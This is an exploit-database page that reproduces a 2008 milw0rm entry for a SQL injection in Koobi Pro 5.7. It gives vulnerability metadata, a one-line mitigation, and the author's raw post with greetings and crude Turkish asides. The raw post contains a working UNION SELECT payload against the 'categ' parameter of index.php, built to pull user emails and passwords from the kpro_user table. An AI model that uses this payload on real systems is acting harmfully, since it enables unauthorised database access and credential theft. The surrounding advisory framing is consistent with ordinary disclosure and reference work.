header-logo
Suggest Exploit
vendor:
Koobi Pro
by:
Cr@zy_King
8.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Koobi Pro
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:koobi:koobi_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Koobi Pro 5.7 index.php (categ) Remote Sql Inj. Vuln

A vulnerability in Koobi Pro 5.7 allows remote attackers to inject arbitrary SQL commands via the categ parameter in a downloads request to index.php.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

+ Koobi Pro 5.7 index.php (categ) Remote Sql Ä°nj. Vuln

+ Cr@zy_King / crazy_kinq@hotmail.co.uk

+ Hack Bir Showdur. / Hackshow.us

+ Greatz : Eno7 & Crackers_Child & Thehacker & The_Bekir & Ghost61 & Tilkiandre & Edoras

+ Not : Alem Göt Olmuş O Götlerin Alayını Dünya Alem Siksin.Başta 2 Kişi onlar

+ kendilerini biliolar

+ Koobi Pro 5.7 Down : http://rapidshare.com/files/20450299/KoobiPro57.rar.html

+ Page : /index.php?area=1&p=downloads&categ=Sql.

+ Sql : -1+union+select+1,concat(email,0x3a,pass),3+from+kpro_user/*

+ Erbay O şimdi asker :D Vatan Size Emanet Kardeşim Allah Yardımcınız oLsun.

# milw0rm.com [2008-02-28]

Navigation

Suggest Exploit

Services By CQR